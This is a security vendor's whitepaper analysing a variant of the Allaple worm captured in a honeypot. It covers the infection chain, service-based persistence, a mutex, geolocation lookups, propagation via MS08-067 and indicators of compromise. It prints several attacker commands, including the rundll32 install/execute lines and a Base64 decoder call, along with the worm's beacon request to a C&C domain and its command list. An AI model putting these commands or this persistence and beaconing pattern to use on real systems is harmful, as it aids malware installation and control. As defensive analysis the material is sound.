a variant of the network worm win32 allaple has been spotted … · 2019-11-13 · authored by...

Authored By: Yakov Goldberg and Maayan Fishelov

Date of Publication: September 2015

A VARIANT OF THE NETWORK WORMWIN32 ALLAPLE HAS BEEN SPOTTED IN THE WILD

2 TrapX Security / / www.trapx.com

TABLE OFCONTENTS

SUMMARY ........................................................................................................................................................ 3

ATTACK VECTOR .............................................................................................................................................. 4

Shell Commands .................................................................................................................................... 4

About the File WINZRK.EXE ................................................................................................................... 5

AN ANATOMY OF THE ALLAPLE WORM ......................................................................................................... 6

Persistence Mechanism ......................................................................................................................... 6

Unique Mutex .......................................................................................................................................... 8

Geographical Location ............................................................................................................................ 9

COMMAND-and-CONTROL Communications ...................................................................................... 10

C&C Commands ................................................................................................................................... 10

Propagation Mechanism ....................................................................................................................... 11

Host Based Indicators .......................................................................................................................... 13

Network Based Indicators .................................................................................................................... 13

About the Authors ................................................................................................................................. 14

ABOUT TRAPX SECURITY.............................................................................................................................. 15


SUMMARY

The TrapX Security Research Lab has tracked, captured, and analyzed a malicious attack against a part of our global DeceptionGrid™. The attacker gained remote shell access to one of our DeceptionGrid components, known as a Trap, created two files inside the trap and finally, executed them. The execution of these files resulted in the creation of a variant of the network Win32 Worm known as the Allaple Worm. At the time of writing, there has been a low detection rate of this Worm through online resources such as VirusTotal. This low rate of detection suggests that the majority of anti-virus vendors currently do not have signature detection for this specific malware variant.

Once the Allaple Worm was executed on a victim’s system it attempted to register and execute itself as a service. Once successfully registered, the Worm then remained persistent through system shutdowns and reboots. Static and dynamic analysis of this variant suggested that the Allaple Worm has a capability to propagate to other systems within the network using Microsoft SMB vulnerabilities. The Worm also attempts to beacon to Command-and-Control domains in an effort to either download additional malware components or send and receive additional commands from an attacker. In this paper, the TrapX Security Research Lab has provided the technical details and initial attack vector about this Worm variant.

The Effectiveness of DeceptionGrid

DeceptionGrid is designed to emulate real Windows Operating System (OS) services and protocols. Traps within DeceptionGrid are designed to capture malware binary files while allowing them to successfully execute in the Trap. Once executed, the Trap is capable of capturing any additional components created or dropped by malware. This process allows the DeceptionGrid technology to effectively scope multiple malware attack vectors. In this whitepaper we describe how an attacker connected to the sensor’s SMB emulation and then exploited it with MS08-067 vulnerability. As a result, the exploit sent a shellcode that was supposed to return a cmd.exe shell back to the attacker. In this process, the sensor then recognized the malicious shellcode opcodes and emulated them one by one. It returned the attacker a fake cmd.exe shell (one that doesn’t actually run the commands the attacker tells it to) and recorded all attacker activity from that point on. As a result, DeceptionGrid successfully captured the commands executed by the attacker, additional binary files that were dropped inside the trap, and all command and control activities. Once the binary files were captured, the malware sandbox ran an analysis to determine their legitimacy. Additional analysis was conducted by the TrapX Lab team to determine the scope of this attack.


Shell Commands When the attacker gained shell access directly into the DeceptionGrid™ platform, they created two files inside our trap, windll.bin and winzrk.bin. These two files were encoded with the Base64 obfuscation scheme. The image below shows the commands in which the attacker was able to accomplish this task:

The attacker then created a Windows Visual Basic Script (VBScript) file named winzrk.vbs. This VBScript file was executed using the cscript Windows command. Upon execution it decoded the winzrk.bin file to the Windows binary file winzrk.exe. The image below shows the VBScript file getting created by the attacker:

ATTACK VECTOR


Finally, the winzrk.exe binary file was used to decode the Base64 windll.bin encoded file to the new Windows Dynamic Link Library (DLL) file named smbnetwork.dll. The DLL file smbnetwork.dll was the Allaple Worm binary file itself. Currently only two anti-virus vendors have a signature to detect this Worm as milicious: ClamAV and Symantec. About the File WINZRK.EXE

The sole purpose of the winzrk.exe binary file was to take and decode any input file encoded with the Base64 scheme. The decoded output was then saved into a new file in the same folder location where the file winzrk.exe was executed. The name of the output file was not static and was determined by the user or the process that executed this tool. However, in this attack vector, the VBScript named the output file smbnetwork.dll. The following image shows that the file winzrk.exe had an embedded Base64 alphabet that was used to test if the input file was encoded with a correct Base64 scheme:

Then the function sub_401150 took the Base64 alphabet and called the input file to check if the file was encoded with a valid Base64 string:

Upon validation a new decoded output file is created in the same output folder location. For example, here is the command used by the attacker to create the DLL file smbnetwork.dll:

winzrk.exe windll.bin smbnetwork.dll


AN ANATOMY OF THE ALLAPLE WORM

Persistence Mechanism

In an effort to stay persistent on the victims system, the Allaple Worm registerd itself as a service. The service name was called SmbNetwork and the ServiceDLL file is the Allaple Worm DLL binary file. The image below shows the registry key created by this Worm against one of our systems in the lab:

In the image on the next page you can see how the Allaple Worm used the Windows API function CreateService to create the [registration] service.


The process by which the Allaple Worm registered itself as a service and then executeed itself on the victims system was done using the following shell commands:

rundll32 smbnetwork.dll InstallService rundll32 smbnetwork.dll ExecuteService Zorn


The image below shows how the attacker executed these shell commands inside our trap:

Static analysis of the Allaple Worm suggests that it used the following Windows API exports:

ExecuteServiceInstallServiceKillServiceRemoveServiceServiceMain

Besides registering and executing as a service, the Allaple Worm had the ability to kill and remove itself from the services on the victims system.

Unique Mutex

The Allaple Worm called the Windows API function CreateMutex and created a unique Mutex object named a15xv9x7s as shown in the image below:


A Mutex (also known as Mutant) is a global object that allows multiple program threads and processes to share the same resource. When a program is executed on the system, a Mutex can be created and it usually has a unique name.

During our investigation, we were able to identify the Mutex name a15xv9x7s inside a memory handle. This suggested that the system was compromised with the Allaple Worm since the Mutex a15xv9x7s is known to be unique to this Worm. Additional information about Mutext objects can be found at the following website https://msdn.microsoft.com/en-us/library/windows/desktop/ms684266(v=vs.85).aspx.

Geographical Location

After the Allaple Worm was successfully executed on the victim’s system, it then connected to the website http://api.hostip.info/get_html.php in an effort to determine its geographical location. The IP and physical location are relative to the geographical location of the system in which this Worm was executed. To accomplish this task, the Allaple Worm established the HTTP communication using a Windows API function called WinHTTPConnect as shown in the image below:

The input offset was then passed to this function as an input value. Once successfully connected to the target website, the Worm then called the Windows API function WinHttpOpenRequest and sent a GET request to this website to receive the geolocation and public IP address relative to the victim’s system.


There are many reasons why malware authors will check geolocation relative to the system their malware was executed on. The most common technique is used to determine the public IP address registered to the company (and the country) the malware was executed from. If the IP address is of interest, the malware will then proceed with the attack vector or perform the next action of commands.

COMMAND-and-CONTROL Communications

The Allaple Worm attempted to communicate with a Command-and-Control (C&C) domain named twofortheworms[.]net46.net. The first HTTP request that the Allaple Worm sent was the following GET request:

GET /command.php?v=6 HTTP/1.1 User-Agent: WinHTTP Example/1.0 Host: twofortheworms.net46.net Connection: Keep-Alive

Unfortunately, the C&C domain is hosted on a free web hosting service and had reached its Central Processing Unit (CPU) limit. Therefore, the C&C was not functional at the time of our investigation. Analysis of the domain www.net46[.]net suggested that it belongs to the web hosting service called www.000webhost.com.

C&C Commands

Once the Allaple Worm successfully connected to the C&C domain, it would use the following commands to perform additional actions on the victims system:

end stop download_and_execute kill execute update shell download

These commands indicate that the Worm could be used to download additional malware components into the victims system. In addition, it could also send and receive additional commands from the C&C domain.

Finally, the Allaple Worm also attempted to communicate with the domain amf45dfv.no-ip[.]org. Several online resources are currently blacklisting this domain.


Propagation Mechanism

The Allaple Worm attempted to ping other IP addresses around the victims network. Once a remote system was detected, the Allaple Worm attempted to conduct a buffer overflow attack by using the DCOM (Remote Procedural Call (RPC) vulnerability associated with the MS08-067 vulnerability. If the exploit was successful, the Allaple Worm will then copy itself across the network into the new system and attempt to repeat the same process described in the attack vector section of this document. The copy process is completed when the affected remote system runs the Worm as a service.

The image below shows some of the name pipes and the server service ncacn_np that were used by the Allaple Worm in an effort to take advantage of RPC binding:

The Allaple Worm took these hardcoded name pipes and then called the Windows API functions


RpcStringBindingCompose and RpcBindingFromStringBinding in an effort to connect to a remote system:

Additional information about string binding and the server service can be found in the following website https://msdn.microsoft.com/en-us/library/aa378691(VS.85).aspx


Host Based Indicators

Object Type Unique Indentifier

smbnetwork.dll Allaple Worm a5015ecf48a5eff60a6f663fedcb8744b82c7a42

windll.bin Base64 Encoded file 740316070e013e35743afad54dc913bbca46fc3a

winzrk.bat Batch File b9bfce80a9f1afd947e44d3427fc8c5d69b934c7

winzrk.bin Base64 Encoded File c5c99e14ab385553a1d74f60835d81be50da572c

winzrk.exe PE32 Tool 2e2e8f926f61671508610598a846386bae592347

winzrk.vbs VBScript dd0aac65f8f5a674f5726565b3807e926db63212

Shared Resources Mutex Object a15xv9x7s

Strings Strings seen in the Windows Client/Server Runtime Subsystem service

rundll32 smbnetwork.dll InstallService rundll32 smbnetwork.dll ExecuteService Zorn

Service Name Service Name SmbNetwork

Service DLL Service DLL path contains smbnetwork.dll

Network Based Indicators

Domain Communication Type

Twofortheworms[.]net46[.]net Command-and-Control

amf45dfv.no-ip[.]org Unknown


About the Authors Yakov Goldberg Senior Security EngineerTrapX Security, TrapX Security Research LabTwitter @ubersec

Maayan Fishelov Security ResearcherTrapX Security, TrapX Security Research Lab


ABOUTTRAPX SECURITY

TrapX Security is a leader in the delivery of deception-based cyber security defense. Our solutions rapidly detect, analyze and defend against new zero-day and APT attacks in real time. DeceptionGrid™ provides automated, highly accurate insight into malware and malicious activity unseen by other types of cyber defense. We enable a proactive security posture, fundamentally changing the economics of cyber defense by shifting the cost to the attacker. The TrapX Security customer base includes Forbes Global 2000 commercial and government customers around the world in sectors that include defense, healthcare, finance, energy, consumer products and other key industries. Learn more at www.trapx.com.

a variant of the network worm win32 allaple has been spotted … · 2019-11-13 · authored by...

Documents